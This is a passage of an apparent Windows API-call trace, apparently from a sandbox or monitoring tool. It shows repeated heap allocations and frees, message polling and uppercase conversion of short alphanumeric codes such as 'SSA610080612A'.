hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.975] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0258.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.978] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0258.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.978] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.979] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.979] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.979] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.980] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.982] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.982] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.983] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.984] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.984] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.984] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.984] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.984] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.984] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.984] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.985] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.985] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.985] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.985] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.985] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.985] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.985] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.985] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.986] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.986] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.986] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.986] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.986] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.986] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.987] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.987] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.987] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.987] 